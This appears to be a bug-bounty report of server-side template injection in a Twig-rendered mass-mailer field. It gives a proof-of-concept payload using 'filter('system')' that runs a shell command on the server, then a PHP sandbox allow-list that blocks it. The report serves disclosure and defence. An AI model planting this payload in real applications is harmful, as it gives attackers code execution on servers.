Server-Side Template Injection leads to Remote Code Execution

Reported 2023-06-15 16:44:55 by hiu240900 on www.huntr.dev
Tags: server-side template injection, remote code execution, admin, staff, mass mailer permission, email content field, bug bounty

EPSS: 0.001 (Low), percentile 45.3%

Description

An admin or a staff member with the “Mass mailer” permission can perform a Server-Side Template Injection attack.

Proof of Concept

Log in as an admin or a staff member who has the “Mass mailer” permission and edit a message.

In the “Email content” field, insert the following value and click “Update and preview”:

{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}

Order our services at {{ "order"|link }}

{{ guest.system_company.name }}
{% endapply %}


Observe that the command “id” was executed on the server.
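The payload uses Twig syntax (the `{% apply %}` tag and the `filter` filter taking a callable name), so the underlying weakness is that staff-editable mail templates are rendered with the full Twig environment. As an added example, not code from the report or the affected project, the following shows how Twig's sandbox extension confines such a template to an allow-list, so that `filter('system')` is rejected at compile time; the `markdown` and `link` filters are stand-ins for the application's own, and Twig 3.x via Composer is assumed.

```php
<?php
// Added example: sandboxing a user-editable Twig template so that the
// callable-taking "filter" filter from the report cannot reach system().
// Assumes Twig 3.x installed via Composer. "markdown" and "link" are
// stand-ins for the application's real filters.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;
use Twig\TwigFilter;

// Constructed template mirroring the report's "Email content" payload.
$emailContent = <<<'TWIG'
{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}
{% endapply %}
TWIG;

$twig = new Environment(new ArrayLoader(['mail' => $emailContent]));
$twig->addFilter(new TwigFilter('markdown', fn (string $s): string => $s));
$twig->addFilter(new TwigFilter('link', fn (string $s): string => '/' . $s));

// Allow-list only what mail templates legitimately need. Filters that
// accept a callable name (filter, map, reduce, sort) are deliberately
// absent, as are any functions or methods that touch the runtime.
$policy = new SecurityPolicy(
    ['apply', 'if', 'for'],                 // allowed tags
    ['markdown', 'link', 'escape', 'upper'], // allowed filters
    [],                                     // allowed methods, per class
    ['stdClass' => ['email', 'name']],       // allowed properties, per class
    ['date']                                // allowed functions
);
// Second argument true: sandbox every template, not only {% sandbox %} blocks.
$twig->addExtension(new SandboxExtension($policy, true));

try {
    echo $twig->render('mail', ['c' => (object) ['email' => 'a@example.com']]);
} catch (SecurityError $e) {
    // Thrown as Twig\Sandbox\SecurityNotAllowedFilterError before anything
    // executes, e.g. 'Filter "filter" is not allowed.'
    error_log('Rejected mail template: ' . $e->getMessage());
}
```

Templates that only use the allow-listed filters and properties render normally; a template that reaches for anything else fails closed with a logged SecurityError, which is also a useful detection signal for attempted injection by privileged users.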

